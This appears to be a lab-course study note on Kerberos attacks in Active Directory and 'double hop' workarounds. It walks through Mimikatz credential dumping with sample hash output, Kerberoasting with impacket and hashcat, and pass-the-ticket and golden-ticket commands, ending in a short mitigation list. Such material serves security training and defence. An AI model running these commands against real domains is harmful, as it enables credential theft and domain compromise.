Kerberos Attack Methods with Double Hop Workarounds

Kerberos Overview

Kerberos is a network authentication protocol used in Active Directory, utilizing tickets issued by the Key Distribution Center (KDC) to grant access without transmitting passwords. A Ticket Granting Ticket (TGT) allows users to request Ticket Granting Service (TGS) tickets for specific resources. The username mrci0x1 will be used where applicable.

Why Target Kerberos? Tickets enable impersonation and unauthorized access to resources, especially in misconfigured environments.

Double Hop Issue

The double hop problem occurs when a TGS ticket is used to access a server (first hop), but the TGT is not cached, preventing authentication to a second resource (second hop).

Example Scenario:

Attack Host: Non-domain-joined system (e.g., Parrot Linux).
DEV01: Server where mrci0x1 has Remote Management Users group privileges.
DC01: Domain controller.
Issue: Accessing DC01 from DEV01 via WinRM fails due to missing TGT.

Demonstration with Mimikatz:

PS C:\> Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\mrci0x1
[DEV01]: PS C:\Users\mrci0x1\Documents> cd 'C:\Users\Public\'
[DEV01]: PS C:\Users\Public> .\mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1284107
User Name         : mrci0x1
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 6/30/2025 5:08:00 AM
SID               : S-1-5-21-1666128402-2659679066-1433032234-1107
    msv :
     * Username : mrci0x1
     * Domain   : INLANEFREIGHT
     * NTLM     : cf3a5525ee9414229e66279623ed5c58
     * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
    kerberos :
     * Username : mrci0x1
     * Domain   : INLANEFREIGHT.LOCAL
     * Password : (null)

Observation: No TGT cached, limiting further authentication.

Enumeration

mrci0x1@htb[/htb]# nmap -p88,389 10.129.201.127

PORT    STATE SERVICE
88/tcp  open  kerberos-sec
389/tcp open  ldap

mrci0x1@htb[/htb]# enum4linux -a 10.129.201.127

Attacks

Kerberoasting:

mrci0x1@htb[/htb]# impacket-GetUserSPNs -dc-ip 10.129.201.127 INLANEFREIGHT.LOCAL/mrci0x1:password

ServicePrincipalName: MSSQLSvc/sqlserver.inlanefreight.local:1433
Ticket: [TGS ticket data]

Crack with Hashcat:

mrci0x1@htb[/htb]# hashcat -m 13100 ticket.hash passwords.txt

Pass-the-Ticket (PtT):

mrci0x1@htb[/htb]# mimikatz.exe "kerberos::ptt ticket.kirbi"

Golden/Silver Ticket:

mrci0x1@htb[/htb]# mimikatz.exe "kerberos::golden /user:mrci0x1 /domain:INLANEFREIGHT.LOCAL /sid:S-1-5-21-1666128402-2659679066-1433032234 /krbtgt:krbtgt_hash /ptt"

Double Hop Workarounds

1. PSCredential Object

Description: Pass credentials explicitly to bypass missing TGT.

*Evil-WinRM* PS C:\Users\mrci0x1\Documents> $SecPassword = ConvertTo-SecureString 'lucky7' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\mrci0x1\Documents> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\mrci0x1', $SecPassword)
*Evil-WinRM* PS C:\Users\mrci0x1\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\mrci0x1\Documents> Get-DomainUser -SPN -Credential $Cred | Select samaccountname

Why Use It? Ideal for non-GUI environments like evil-winrm.

2. PSSession Configuration

Description: Register a session to cache Kerberos tickets.

PS C:\> Register-PSSessionConfiguration -Name mrci0x1sess -RunAsCredential INLANEFREIGHT\mrci0x1
PS C:\> Restart-Service WinRM
PS C:\> Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\mrci0x1 -ConfigurationName mrci0x1sess
[DEV01]: PS C:\Users\mrci0x1\Documents> klist

Limitations: Requires GUI and elevated PowerShell; not compatible with Linux-based PowerShell.

Mitigation

Enforce strong passwords for service accounts.
Limit SPN usage.
Monitor KDC logs.
Disable unconstrained delegation.
Use AES encryption.
Patch systems.

Resources

PreviousPrivileged Access NextBleeding Edge Vulnerabilities

Last updated 1 month ago